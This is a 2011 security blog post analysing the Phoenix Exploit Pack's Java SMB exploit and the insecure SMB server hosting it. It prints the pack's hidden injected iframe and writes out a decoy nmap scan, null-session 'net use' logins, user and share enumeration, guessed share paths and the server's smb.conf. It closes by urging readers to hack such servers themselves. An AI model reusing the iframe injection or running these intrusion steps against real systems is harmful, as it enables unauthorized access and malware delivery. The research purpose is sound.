Wednesday, April 6, 2011

Hacking Free Bird - SMB - Phoenix EP 2.5



Recently, we came across Phoenix Exploit Pack 2.5 which has included number of new Java and other exploits. We detected the hidden iframe as

[iframe src="http://phoenix_host/phx/index.php" width="1" height="1" frameborder="0"][/iframe]

As we know, JAVA SMB is one of the most exploited vulnerability in the recent times. In the last POST, we talked about exploit obfuscation in BlackHole exploit pack. However, it has been analyzed that both exploit packs use similar name "new.avi" for the successful execution of the Java SMB exploit. Further, newer versions of the Phoenix exploit pack 2.5 includes other Java exploits as JAVA RMI, JAVA MIDI and JAVA SKYLINE

We have analyzed certain number of domains that used to host SMB servers which is required to trigger the Java SMB exploit appropriately. However, SMB server has to be open to the world in order to execute the exploit. It can be hosted on the same domain as of Phoenix exploit pack or it can be on different domain. During the course of this analysis, we found number of vulnerable or insecure SMB servers which were serving SMB exploit file new.avi. Securing SMB server is typically a hard task if one does not understand configuration in a right manner (script kiddies etc). We ran nmap Decoy scan in a stealth manner to check the presence of RPC SMB port 445

nmap -P0 -A -T4 -sS phoenix_host -D 112.123.124.111 -p 445
Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-06 13:07 Eastern Daylight Time
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X
Running: Linux 2.6.X
OS details: Linux 2.6.17 - 2.6.35
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: VMWARE-VIRTUAL-, NetBIOS user: , NetBIOS MAC:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.5.4)
| Name: Unknown\Unknown
|_ System time: 2011-04-06 13:11:10 UTC-7


We found that phoenix host is actually running port 445. On continuous monitoring, we analyzed that SMB server was hosted on the domain serving Phoenix exploit pack. Since the port was in open state, we verified random access from our virtual machine running Win XP SP3 as follows:

E:\audit>net use \\phoenix_host\IPC$ /user:root
The command completed successfully.

E:\audit>net use \\phoenix_host\IPC$ /user:AAAAAAAA
The command completed successfully.

E:\audit>net use \\phoenix_host\IPC$ /user:guest
The command completed successfully.

E:\audit>net use \\phoenix_host\IPC$ /user:XXXX
The command completed successfully.


This shows that default access was allowed on SMB server which was running in shared mode security. However, no user mode security is applied. In general, this can be made more restricted and shares can be accessed without querying the SMB server in default mode. Here we used, random names and all were allowed access to IPC$ which was quite rogue. We tried to get some information and was successful in getting userlist, password policy information and share list etc

E:\audit>enum -P phoenix_host
server: phoenix_host
setting up session... success.
password policy:
min length: 5 chars
min age: none
max age: none
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.

E:\audit>enum -S phoenix_host
server: phoenix_host
connected as Chimera\Administrator, disconnecting... success.
setting up session... success.
enumerating shares (pass 1)... got 1 shares, 0 left:
IPC$
cleaning up... success.

E:\audit>enum -U phoenix_host
server: phoenix_host
setting up session... success.
getting user list (pass 1, index 0)... success, got 2.
rocky root
cleaning up... success.


At this point of time we found that there were no shares enumerated. This gave us an impression that share serving "new.avi" file was not "browseable". We took a look around , search over the internet and used simple combinatorial SMB URI's for accessing share as

\\phoenix_host\home\new.avi
\\phoenix_host\usr\new.avi
\\phoenix_host\home\smb\new.avi
\\phoenix_host\usr\smb\new.avi
\\....
......

The connection in the bold worked well for us. When we used that link from our virtual machine, we got positive response as follows

E:\audit>net use \\phoenix_host\smb
The command completed successfully.


URI:(\\phoenix_host\home\smb\new.avi) directly included exploit file in the target victim system and started running the exploit file. The file was accessed through firefox as



We reversed the process. We tried to define the parameters in smb.conf file used by the vulnerable server and we cam across following settings

[global]
security = share
[smb]
comment = smb
path = /home/smb
public = yes
browseable = no
writeable = no
guest ok = yes


At last, we succeeded in cracking the login account for SMB users for getting access to the server. One can also use Metasploit in order to query and run auxillary modules on SMB server.

This analysis shows that, it is possible to hack in the BEP's successfully. Try your hands on, we are sure you will hack the free bird.